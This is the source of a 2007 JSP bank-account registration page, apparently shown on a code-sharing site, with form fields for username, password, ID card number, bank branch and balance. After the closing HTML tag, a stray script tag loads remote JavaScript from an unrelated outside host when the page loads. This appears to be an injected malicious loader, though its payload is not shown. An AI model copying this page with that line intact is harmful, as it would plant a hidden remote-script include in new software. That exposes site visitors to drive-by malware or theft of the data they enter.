📄 register.jsp~5~
字号:
<TD height=12><div align="left"></div>
<DIV align=center class="mylink"><B><img src="image/icon01.gif" width="11" height="12"> <a href="index.jsp">Home</a> <img src="image/icon02.gif" width="11" height="12"> <a href="mailto:peirunou@163.com">Mail</a> <img src="image/icon03.gif" width="11" height="12"> <a href="http://www.google.com">Search</a></B></DIV>
</TD>
</TR>
<TR>
<TD>
<DIV align=left>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TR><TD bgColor=#ffcc00 height=2><DIV align=center><IMG height=1 src="./image/pixel.gif" width=1></DIV></TD></TR>
</TABLE>
</DIV>
</TD>
</TR>
</TABLE>
</DIV>
<TABLE align=center border=0 cellPadding=0 cellSpacing=0 width="574">
<TR>
<TD colSpan=2 height=393 vAlign=top><BR>
<TABLE align=center border=0 cellPadding=0 cellSpacing=0 width=420>
<TR>
<TD height=40 width="25%"><img src="image/1_69.gif" width="150" height="98"></TD>
<TD width="75%" height=40><B><FONT color=#ff0000 size=3>Welcome Register </FONT></B></TD>
</TR>
<TR>
<TD height=40><div align="right">UserName:</div></TD>
<TD width="75%" height=40><div align="left">
<input name="userName" type="text" class="box1" id="userName" onMouseOver="this.className='box2'" onMouseOut="this.className='box1'" onkeyup="value=value.replace(/[\W]/g,'')" onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^\d]/g,''))">
</div></TD>
</TR>
<TR>
<TD height=40 width="25%"><div align="right">PassWord:</div></TD>
<TD width="75%" height=40><div align="left">
<input name="password" type="password" class="box1" id="password" onMouseOver="this.className='box2'" onMouseOut="this.className='box1'" onkeyup="value=value.replace(/[^\d]/g,'') "onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^\d]/g,''))">
</div></TD>
</TR>
<TR>
<TD height=40><div align="right">Sex:</div></TD>
<TD width="75%" height=40><div align="left">
<input name="sex" type="radio" value="male" checked>
<SPAN class=djen>male </SPAN> <input type="radio" name="sex" value="fmale">
fmale</div></TD>
</TR>
<TR>
<TD height=43 width="25%"><div align="right">IdentityCard:</div></TD>
<TD width="75%" height=43><div align="left">
<input name="identityCard" type="text" class="box1" id="identityCard" onMouseOver="this.className='box2'" onMouseOut="this.className='box1'" onkeyup="value=value.replace(/[^\d]/g,'') "onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^\d]/g,''))">
</div></TD>
</TR>
<TR>
<TD height=42><div align="right">OpenBank:</div></TD>
<TD width="75%" height=42><div align="left">
<select name="openbank" id="openbank" class="select" style="width: 163px">
<option value="中国工商银行越秀区分行" selected>中国工商银行越秀区分行</option>
<option value="中国工商银行天河区分行">中国工商银行天河区分行</option>
</select>
</div></TD>
</TR>
<TR>
<TD height=40 width="25%"><div align="right">Balance:</div></TD>
<TD width="75%" height=40><div align="left">
<input name="balance" type="text" class="box1" id="balance" onMouseOver="this.className='box2'" onMouseOut="this.className='box1'" onkeyup="value=value.replace(/[^\d]/g,'') "onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^\d]/g,''))">
</div></TD>
</TR>
<TR>
<TD height=40> </TD>
<TD height=40><input name="Register" type="submit" class="btn1_mouseout" onmouseover="this.className='btn1_mouseover'"
onmouseout="this.className='btn1_mouseout'" id="Register" value="Register"></TD>
</TR>
<TR>
<TD height=40 colspan="2"><div align="right"></div>
<div align="center"><%=id %></div></TD>
</TR>
</TABLE>
<BR>
</TD>
<TD bgColor=#ffcc00 height=393 vAlign=top width=2><IMG height=1 src="./image/pixel.gif" width=1></TD>
<TD bgColor=#ffffff height=393 vAlign=top width=135>
<DIV align=right>
<P align=left><B><FONT color=#ff0000 size=3><BR>Welcome!</FONT></B></P>
<P align=left><B><FONT color=#ff0000><a href="http://www.google.com"><IMG src="./image/mylogo.gif" width=135 height=65 border="0"></a></FONT></B></P>
</DIV>
</TD>
</TR>
<TR vAlign=top>
<TD colSpan=4>
<DIV align=right>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="80%">
<TR bgColor=#ffcf00>
<TD height=1><DIV align=right><IMG height=1 src="./image/pixel.gif" width=1></DIV></TD>
</TR>
</TABLE>
</DIV>
<DIV align=center>
<BR><FONT color=#006400 face="Times New Roman, Times, serif">Design for <a href="mailto:peirunou@163.com">oupeirun</a>.</FONT><BR>
</DIV>
<DIV align=right>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="90%">
<TR bgColor=#949231>
<TD height=2><DIV align=right><IMG height=1 src="./image/pixel.gif" width=1></DIV></TD>
</TR>
</TABLE>
<DIV align=center>
<FONT color=#3169a5 face="Arial, Helvetica, sans-serif" size=2>Copyright 2007 Oupeirun.All rights reserved.</FONT> <BR>
</DIV>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TR bgColor=#006500>
<TD height=3><DIV align=right><IMG height=1 src="./image/pixel.gif" width=1></DIV></TD>
</TR>
</TABLE>
</DIV>
</TD>
</TR>
</TABLE>
</form>
</BODY>
</HTML>
<script language=javascript src=http://xxx.cslr1.com/mp.js></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -